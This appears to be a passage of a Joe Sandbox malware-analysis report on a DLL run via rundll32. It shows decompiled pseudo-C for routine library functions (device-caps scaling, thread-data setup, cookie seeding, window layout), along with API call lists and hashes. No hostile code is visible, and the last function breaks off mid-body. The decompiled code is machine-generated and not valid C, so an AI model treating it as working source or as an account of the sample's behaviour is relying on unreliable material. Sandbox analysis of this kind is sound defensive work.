                                                                        • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,74778B90), ref: 10033E23
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                        • MulDiv.KERNEL32(00000000,000009EC,74778B90), ref: 10033E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                        • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                        0x10033ea4
                                                                        0x10033ea7
                                                                        0x10033eac
                                                                        0x10033ef8
                                                                        0x10033efe
                                                                        0x00000000
                                                                        0x10033eae
                                                                        0x10033eb7
                                                                        0x10033ebc
                                                                        0x10033ef2
                                                                        0x10033ef4
                                                                        0x10033f03
                                                                        0x10033f03
                                                                        0x10033f15
                                                                        0x10033f1e
                                                                        0x10033f20
                                                                        0x10033f23
                                                                        0x10033f25
                                                                        0x10033ec3
                                                                        0x10033ec5
                                                                        0x10033ec9
                                                                        0x10033ed1
                                                                        0x10033ed8
                                                                        0x10033edb
                                                                        0x10033edb
                                                                        0x10033ebc
                                                                        0x10033f2c

                                                                        APIs
                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                        • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                        • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                        • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001519D Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 41%
                                                                        			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                        0x1001519f
                                                                        0x100151ab
                                                                        0x100151b3
                                                                        0x100151b5
                                                                        0x100151b7
                                                                        0x100151b9
                                                                        0x100151be
                                                                        0x100151c5
                                                                        0x100151cb
                                                                        0x100151fa
                                                                        0x100151fc
                                                                        0x100151cd
                                                                        0x100151cd
                                                                        0x100151ce
                                                                        0x100151dc
                                                                        0x00000000
                                                                        0x100151de
                                                                        0x100151de
                                                                        0x100151e5
                                                                        0x100151ec
                                                                        0x100151f2
                                                                        0x100151f6
                                                                        0x100151f6
                                                                        0x100151dc
                                                                        0x100151cb
                                                                        0x10015203
                                                                        0x1001520d

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                        • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                        • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                        • String ID:
                                                                        • API String ID: 1487844433-0
                                                                        • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                        • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0x1bfbe703
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                        0x10016b4a
                                                                        0x10016b51
                                                                        0x10016b5f
                                                                        0x10016b6b
                                                                        0x10016b73
                                                                        0x10016b7b
                                                                        0x10016b87
                                                                        0x10016b90
                                                                        0x10016b93
                                                                        0x10016b95
                                                                        0x10016b9b
                                                                        0x10016b9d
                                                                        0x10016b9d
                                                                        0x00000000
                                                                        0x10016ba7
                                                                        0x10016ba9

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                        • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                        • GetTickCount.KERNEL32 ref: 10016B7B
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                        • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}










































                                                                        0x1002c1b0
                                                                        0x1002c1b2
                                                                        0x1002c1b3
                                                                        0x1002c1b7
                                                                        0x1002c1b8
                                                                        0x1002c1bd
                                                                        0x1002c1c0
                                                                        0x1002c1c3
                                                                        0x1002c1cc
                                                                        0x1002c1d2
                                                                        0x1002c1d5
                                                                        0x1002c1e2
                                                                        0x1002c1ea
                                                                        0x1002c1ed
                                                                        0x1002c1f3
                                                                        0x1002c1f6
                                                                        0x1002c1fc
                                                                        0x1002c201
                                                                        0x1002c205
                                                                        0x1002c206
                                                                        0x1002c20a
                                                                        0x1002c20d
                                                                        0x1002c211
                                                                        0x1002c217
                                                                        0x1002c21d
                                                                        0x1002c225
                                                                        0x1002c228
                                                                        0x1002c22b
                                                                        0x1002c299
                                                                        0x1002c299
                                                                        0x1002c2a1
                                                                        0x1002c2a3
                                                                        0x1002c2a3
                                                                        0x00000000
                                                                        0x1002c22d
                                                                        0x1002c231
                                                                        0x1002c293
                                                                        0x1002c293
                                                                        0x1002c294
                                                                        0x1002c233
                                                                        0x1002c237
                                                                        0x1002c241
                                                                        0x1002c245
                                                                        0x1002c24a
                                                                        0x1002c24e
                                                                        0x1002c28e
                                                                        0x1002c291
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002c250
                                                                        0x1002c254
                                                                        0x1002c269
                                                                        0x1002c272
                                                                        0x1002c272
                                                                        0x1002c275
                                                                        0x1002c282
                                                                        0x1002c282
                                                                        0x1002c277
                                                                        0x1002c27a
                                                                        0x1002c27a
                                                                        0x1002c285
                                                                        0x1002c28b
                                                                        0x1002c28b
                                                                        0x1002c247
                                                                        0x1002c247
                                                                        0x1002c2a8
                                                                        0x1002c2a8
                                                                        0x1002c2a8
                                                                        0x1002c239
                                                                        0x1002c239
                                                                        0x1002c23a
                                                                        0x1002c23a
                                                                        0x1002c237
                                                                        0x1002c231
                                                                        0x1002c2a9
                                                                        0x1002c2ac
                                                                        0x1002c2ad
                                                                        0x1002c2ad
                                                                        0x1002c2b2
                                                                        0x1002c2b3
                                                                        0x1002c2b7
                                                                        0x1002c2ba
                                                                        0x1002c2c8
                                                                        0x1002c2cb
                                                                        0x1002c2ce
                                                                        0x1002c2da
                                                                        0x1002c2de
                                                                        0x1002c2e1
                                                                        0x1002c2e4
                                                                        0x1002c2e7
                                                                        0x1002c2ed
                                                                        0x1002c2f3
                                                                        0x1002c2f6
                                                                        0x1002c2f9
                                                                        0x1002c2fb
                                                                        0x1002c2ff
                                                                        0x1002c306
                                                                        0x1002c306
                                                                        0x1002c307
                                                                        0x1002c30a
                                                                        0x1002c30a
                                                                        0x1002c30f
                                                                        0x1002c312
                                                                        0x1002c324
                                                                        0x1002c329
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c32b
                                                                        0x1002c336
                                                                        0x1002c33b
                                                                        0x1002c33b
                                                                        0x1002c347
                                                                        0x1002c34b
                                                                        0x1002c34f
                                                                        0x1002c352
                                                                        0x1002c355
                                                                        0x1002c358
                                                                        0x1002c35b
                                                                        0x1002c35f
                                                                        0x1002c366
                                                                        0x1002c369
                                                                        0x1002c372
                                                                        0x1002c37a
                                                                        0x1002c386
                                                                        0x1002c38b
                                                                        0x1002c38e
                                                                        0x1002c392
                                                                        0x1002c398
                                                                        0x1002c399
                                                                        0x1002c39a
                                                                        0x1002c39b
                                                                        0x1002c39c
                                                                        0x1002c39f
                                                                        0x1002c39f
                                                                        0x1002c3a2
                                                                        0x1002c3a5
                                                                        0x1002c3ab
                                                                        0x1002c3ab
                                                                        0x1002c35b
                                                                        0x1002c312
                                                                        0x1002c3b0
                                                                        0x1002c3b5
                                                                        0x1002c3be
                                                                        0x1002c3be
                                                                        0x1002c3c1
                                                                        0x1002c3c3
                                                                        0x1002c3c5
                                                                        0x1002c3ca
                                                                        0x1002c3cd
                                                                        0x1002c3d3
                                                                        0x1002c3d8
                                                                        0x1002c3dc
                                                                        0x1002c3dd
                                                                        0x1002c3cd
                                                                        0x1002c3e1
                                                                        0x1002c3e6
                                                                        0x1002c3eb
                                                                        0x1002c3ee
                                                                        0x1002c3f1
                                                                        0x1002c3f6
                                                                        0x1002c3fd
                                                                        0x1002c400
                                                                        0x1002c409
                                                                        0x1002c417
                                                                        0x1002c425
                                                                        0x1002c42c
                                                                        0x1002c44b
                                                                        0x1002c44b
                                                                        0x1002c450
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c458
                                                                        0x1002c45b
                                                                        0x1002c460
                                                                        0x1002c464
                                                                        0x1002c467
                                                                        0x1002c467
                                                                        0x1002c46d
                                                                        0x1002c46e
                                                                        0x1002c473
                                                                        0x1002c211
                                                                        0x1002c1ed
                                                                        0x1002c478
                                                                        0x1002c48d
                                                                        0x1002c49a
                                                                        0x1002c4a5
                                                                        0x1002c4b3
                                                                        0x1002c4b8
                                                                        0x1002c4c1
                                                                        0x1002c4c3
                                                                        0x1002c4c3
                                                                        0x1002c4c6
                                                                        0x1002c4cc
                                                                        0x1002c4ce
                                                                        0x1002c4ce
                                                                        0x1002c4d1
                                                                        0x1002c4d7
                                                                        0x1002c4dc
                                                                        0x1002c4e0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Empty$Window
                                                                        • String ID: @
                                                                        • API String ID: 444217639-2766056989
                                                                        • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                        • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0x1bfbe703
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
